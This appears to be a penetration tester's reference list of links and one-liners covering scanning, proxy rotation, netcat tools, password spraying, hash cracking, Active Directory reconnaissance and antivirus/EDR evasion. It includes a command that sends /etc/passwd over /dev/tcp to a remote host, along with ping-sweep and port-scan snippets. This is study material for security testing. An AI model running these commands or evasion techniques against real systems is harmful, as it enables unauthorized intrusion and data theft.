https://github.com/ustayready/fireprox
https://github.com/blacklanternsecurity/TREVORproxy
https://github.com/Shellntel/scripts/blob/master/proxyCannon.py
https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon
RustScan: https://github.com/RustScan/RustScan
How to write a port scanner in Go: https://github.com/jboursiquot/portscan
PowerShell ping sweep example:
1..60 | % {echo $_; ping -n 1 -w 100 10.10.10.$_ | select-string ttl}
PowerShell port scan example:
70..90 | % {echo $_; echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.50",$_)) "Port $_ is open" } 2>$null
Connect to a port:
echo "" > /dev/tcp/142.250.138.139/443
Send a file:
cat /etc/passwd > /dev/tcp/10.10.10.10/4444
Powercat: https://github.com/besimorhino/powercat
Nmap's ncat: https://nmap.org/ncat/
pwncat, "python netcat on steroids": https://github.com/cytopia/pwncat
socat: https://linux.die.net/man/1/socat
lolcat (lol): https://github.com/busyloop/lolcat
Awesome lolcat from Jeff McJunkin:
while true; do fortune | cowsay -f $(find /usr/share/cowsay/cows/ -type f | sort -R | head -n1) |
lolcat -a -s 40; sleep 2; done
Can use telnet, too (although it is not a cat): telnet ip port
https://github.com/vulnersCom/nmap-vulners
https://wiki.skullsecurity.org/index.php/Passwords
DomainPasswordSpray: https://github.com/dafthack/DomainPasswordSpray/
SprayingToolkit: https://github.com/byt3bl33d3r/SprayingToolkit
TrevorSpray: https://github.com/blacklanternsecurity/TREVORspray
https://www.verizon.com/business/resources/reports/dbir/
Windows: https://lolbas-project.github.io/
Linux: https://gtfobins.github.io/
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
https://github.com/Flangvik/SharpCollection
https://github.com/hausec/Bloodhound-Custom-Queries
https://github.com/fox-it/BloodHound.py
https://github.com/Group3r/Group3r
NPK: https://github.com/c6fc/npk
Distributed hashcat: https://github.com/hashtopolis/server
High-value rule from different sets combined into one: https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule
KoreLogic masks: https://blog.korelogic.com/blog/2014/04/04/pathwell_topologies
CrackStation's giant wordlist: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
John Jumbo: https://github.com/openwall/john
CrackMapExec: https://github.com/Porchetta-Industries/CrackMapExec
DefenderCheck: https://github.com/matterpreter/DefenderCheck
AMSITrigger: https://github.com/RythmStick/AMSITrigger
https://vanmieghem.io/blueprint-for-evading-edr-in-2022/
https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html
https://github.com/TheWover/donut
Talk the Windows API directly with PowerShell: https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1/